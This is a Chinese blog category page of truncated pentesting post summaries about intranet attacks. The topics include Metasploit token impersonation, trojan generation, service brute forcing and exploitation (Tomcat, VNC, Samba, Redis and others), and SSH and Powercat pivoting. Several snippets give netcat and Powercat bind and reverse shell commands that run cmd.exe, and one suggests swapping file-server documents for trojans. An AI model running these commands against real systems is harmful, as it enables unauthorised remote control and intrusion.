随笔分类 - 内网
摘要:一、最简单的TCP连接 1、服务端 import socket # 1、建立一个socket对象,AF_INET网络通信,SOCK_STREAM说明是TCP协议 server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 2、绑定IP端口
阅读全文
摘要:一、列举令牌 msf中只有获取到管理员权限才能列举其他令牌(可能是因为系统本版问题,反正我试了很多次都只有管理员权限才能) use incognito list_tokens -u 二、假冒令牌 假冒令牌XF域的管理员令牌 impersonate_token XF\\administrator 三、
阅读全文
摘要:一、安装 服务端要以管理员权限运行 客户端 二、监听 三、生成木马 四、受害者上线 五、执行命令 所要执行的命令前面加一个shell 六、脚本添加 七、进程迁移
阅读全文
摘要:一、了解网络(信息搜集) 1、分析网络中有哪些主机(PC,SERVER,/LINUX/WINDOWS打印机) 2、分析服务,分析端口 3、服务器攻击方法 爆破 漏洞 smb 欺骗 钓鱼 二、流量监听工具的使用 1、cain 2、wireshark 三、hydra 参数详解: -R 根据止一次进度继续
阅读全文
摘要:一、NC 目标机 nc.exe -l -p 1122 -t -e cnd.exe 攻击机 nc.exe 192.168.8.149 1122 二、termite 程序地址, http://rootkiter.com/Termite/ 一款极度小巧灵活的跳板机,有别于传统socks代理,它对于复杂内网
阅读全文
摘要:一、内网信息搜集 1、对内网的拓补图进行分析 2、对当前机器角色进行分析 判断当前主机是web服务器 开发测试服务器:可以得到公司产品源码 公共服务器 文件服务器:可以用木马替换文件服务器里面的word,内网主机打开就上线 代理服务器:获取账号,用来撞库 dns服务器:可以探测是否拥有内网服务器,或
阅读全文
摘要:一、介绍 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。默认情况下,8180端口是tomcat管理的HTTP端口 二、探测目标tomcat 使用 nmap -sV -p 81
阅读全文
摘要:一、介绍 IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务。IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件
阅读全文
摘要:一、介绍 VNC (Virtual Network Console)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。可视化控制,类似于远程桌面,默认vnc服务端运行在5900端口 二、探测vnc 三、msf暴力破解 use auxiliary/scan
阅读全文
摘要:一、介绍 PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MV
阅读全文
摘要:一、介绍 ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序 http://www.proftpd.org/ 二、探测目标proftpd服务 三、查找对应漏洞 在 https://www.exploit-db.com/ 输入对应软件及版本搜索
阅读全文
摘要:一、介绍 NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。 二、探测版本 三、脚本探
阅读全文
摘要:一、介绍 Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。 RMI是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JA
阅读全文
摘要:一、介绍 远程登录(rlogin) 是一个UNIX命令,它允许授权用户进入网络中的其它UNIX机器并且就像用户在现场操作一样。一旦进入主机,用户可以操作主机允许的任何事情 二、探测 使用nmap -sV -p 512,513 IP地址探测目标rlogin版本信息。512用于对远程执行的进程进行验证5
阅读全文
摘要:一、介绍 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB( Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。一般运行在139、
阅读全文
摘要:一、FTP介绍 文件传输协议(英文: File Transfer Protocol,缩写: FTP)是用于在网络.上进行文件传输的一-套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。 二、用户分类: Real用户 Administrator 匿名用户 三、FTP文
阅读全文
摘要:一、安装Redis 1、下载安装包 wget http://download.redis.io/releases/redis-3.2.0.tar.gz 2、解压安装包 tar xzf redis-3.2.0.tar.gz 3、安装 cd redis-3.2.0/ make //编译的意思 二、配置R
阅读全文
摘要:一、版本 SMB(全称是Server Message Block)是一个协议名,它能被用于客户端与服务器之间的信息沟通。 SMB1- Windows 2000,XP and Windows 2003 SMB2 - Windows Vista sP1 and Windows 2008 SMB2.1 -
阅读全文
摘要:一、本地端口转发(跳板机有外网和内网地址) 1、跳板机配置 vim /etc/ssh/sshd_config //SSH配置文件 AllowAgentForwarding yes //是否允许转发TCP协议 GatewayPorts yes //是否允许远程主机连接本地转发端口 PermitRoot
阅读全文
摘要:一、正向连接 //windows7下执行(受害机) Powercat -l -p 8080 -e cmd.exe -v //kali下执行(攻击机) nc 192.168.227.161 8080 -vv 二、反向连接 //windows7下执行(受害机) Powercat -c 192.168.2
阅读全文
浙公网安备 33010602011771号